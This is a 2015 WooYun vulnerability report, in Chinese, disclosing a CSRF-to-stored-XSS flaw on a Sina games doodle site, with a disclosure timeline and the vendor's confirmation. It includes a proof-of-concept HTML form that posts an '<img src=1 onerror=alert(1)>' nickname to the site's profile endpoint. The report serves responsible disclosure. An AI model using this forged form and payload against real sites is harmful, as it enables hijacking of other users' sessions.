当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126377

漏洞标题:新浪某站csrf导致xss

相关厂商:新浪

漏洞作者: 路飞

提交时间:2015-07-13 12:19

修复时间:2015-08-27 13:30

公开时间:2015-08-27 13:30

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

新浪某站csrf导致xss

详细说明:

新浪某站csrf导致xss

漏洞证明:

http://games.sina.com.cn/tuya/index.shtml


首先注册一个新浪账号,来登陆这个网站。
昵称就是触发位置:

1.jpg


点击我的资料进行修改

2.jpg


触发成功:

3.jpg


这样只能x自己 如何x别人尼 csrf

4.jpg


poc

<tbody><tr> 
<td style="background:url(http://image2.sina.com.cn/qc/xiaoshou/060825tuya/auto_zyx_043.gif) left no-repeat #D5D5D5" height="27" width="748"></td></tr>
<tr>
<td height="8" background="http://image2.sina.com.cn/qc/xiaoshou/060825tuya/auto_zyx_019.gif" width="570"></td></tr>

<tr><td height="300"><table align="center" border="0" cellpadding="5" cellspacing="0" width="60%">
<form action="http://tuya.games.sina.com.cn/documents_opt.php" method="post" target="hidden_frame">
<tbody><tr class="c04">
<td align="right" width="100">我的帐号:</td>
<td>
xxxx@qq.com
</td>
</tr>
<tr class="c04">
<td align="right" width="100">我的昵称:</td>
<td>
<input class="select3" name="nickname" value="<img src=1 onerror=alert(1)>" size="32" type="text">
</td>
</tr>
<tr class="c04">
<td align="right" width="100">我的邮箱:</td>
<td>
<input class="select3" name="email" value="222@qq.com" size="32" type="text">
</td>
</tr>
<tr class="c04">
<td height="32">&nbsp;</td>
<td>
<input class="select3" value="修 改" type="submit"> &nbsp;
<input class="select3" value="重 置" type="reset">
</td>
</tr>
</form>
</tbody></table></td></tr>
<tr>
<td height="8" background="http://image2.sina.com.cn/qc/xiaoshou/060825tuya/auto_zyx_020.gif" width="570"></td></tr>

<!--最热涂鸦结束-->


</tbody>


成功让别人x自己

5.jpg


接下来就可以利用xss平台来了 就不演示了

修复方案:

版权声明:转载请注明来源 路飞@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-07-13 13:29

厂商回复:

感谢支持,漏洞修复中

最新状态:

暂无


漏洞评价:

评论